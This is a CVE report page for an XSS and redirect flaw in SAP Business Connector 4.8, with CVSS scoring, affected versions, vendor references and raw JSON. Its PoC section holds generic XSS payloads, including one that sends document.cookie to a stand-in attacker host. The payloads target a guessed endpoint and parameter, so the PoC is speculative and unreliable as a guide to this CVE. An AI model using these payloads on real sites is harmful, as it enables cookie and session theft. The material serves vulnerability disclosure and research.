Security Vulnerability Report
CVE-2026-0514 CVSS 6.1 MEDIUM

Published: 2026-01-13 02:15:54
Last Modified: 2026-01-16 16:53:03

Description

Due to a Cross-Site Scripting (XSS) vulnerability in SAP Business Connector, an unauthenticated attacker could craft a malicious link. When an unsuspecting user clicks this link, the user may be redirected to a site controlled by the attacker. Successful exploitation could allow the attacker to access or modify information related to the webclient, impacting confidentiality and integrity, with no effect on availability.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:sap:business_connector:4.8:*:*:*:*:*:*:* - VULNERABLE
All versions of SAP Business Connector without the security patch installed

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2026-0514 PoC - XSS in SAP Business Connector -->
<!-- Example malicious URL that could trigger the XSS vulnerability -->
<script>
// Simulated XSS payload for SAP Business Connector
// This demonstrates how an attacker might craft a malicious link
// The closing tag inside the string is written as "<\/script>" so the
// HTML parser does not treat it as the end of this <script> element
const maliciousPayload = '<script>alert("XSS - CVE-2026-0514")<\/script>';
const baseUrl = 'https://<sap-business-connector-host>/';

// Attack scenario: Craft a URL with XSS payload in a parameter
// Common vulnerable parameters might be: id, name, page, redirect, url, etc.
const vulnerableEndpoint = 'webclient/redirect';
const maliciousUrl = `${baseUrl}${vulnerableEndpoint}?url=${encodeURIComponent(maliciousPayload)}`;
console.log('Malicious URL for social engineering:');
console.log(maliciousUrl);

// Another common XSS vector
const xssVector2 = '" onerror="alert(document.cookie)" "';
const maliciousUrl2 = `${baseUrl}${vulnerableEndpoint}?param=${encodeURIComponent(xssVector2)}`;
console.log('\nAlternative XSS vector:');
console.log(maliciousUrl2);

// When victim clicks the link, they will be redirected to attacker's site
// The payload executes in the context of the vulnerable domain
const redirectPayload = '<img src=x onerror="window.location=\'https://attacker-controlled-site.com/steal?cookie=\'+document.cookie">';
console.log('\nRedirect payload:');
console.log(redirectPayload);
</script>

References

https://me.sap.com/notes/3666061 (Permissions Required)
https://url.sap/sapsecuritypatchday (Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-0514",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-13T02:15:54.113",
    "lastModified": "2026-01-16T16:53:03.113",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Due to a Cross-Site Scripting (XSS) vulnerability in SAP Business Connector, an unauthenticated attacker could craft a malicious link. When an unsuspecting user clicks this link, the user may be redirected to a site controlled by the attacker. Successful exploitation could allow the attacker to access or modify information related to the webclient, impacting confidentiality and integrity, with no effect on availability."
      },
      {
        "lang": "es",
        "value": "Debido a una vulnerabilidad de cross-site scripting (XSS) en SAP Business Connector, un atacante no autenticado podría crear un enlace malicioso. Cuando un usuario desprevenido hace clic en este enlace, el usuario podría ser redirigido a un sitio controlado por el atacante. La explotación exitosa podría permitir al atacante acceder o modificar información relacionada con el cliente web, lo que afectaría la confidencialidad y la integridad, sin efecto en la disponibilidad."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 6.1,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [{"lang": "en", "value": "CWE-79"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:sap:business_connector:4.8:*:*:*:*:*:*:*",
                "matchCriteriaId": "99F0C742-7E03-425D-BCFC-F4683843350F"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {"url": "https://me.sap.com/notes/3666061", "source": "[email protected]", "tags": ["Permissions Required"]},
      {"url": "https://url.sap/sapsecuritypatchday", "source": "[email protected]", "tags": ["Vendor Advisory"]}
    ]
  }
}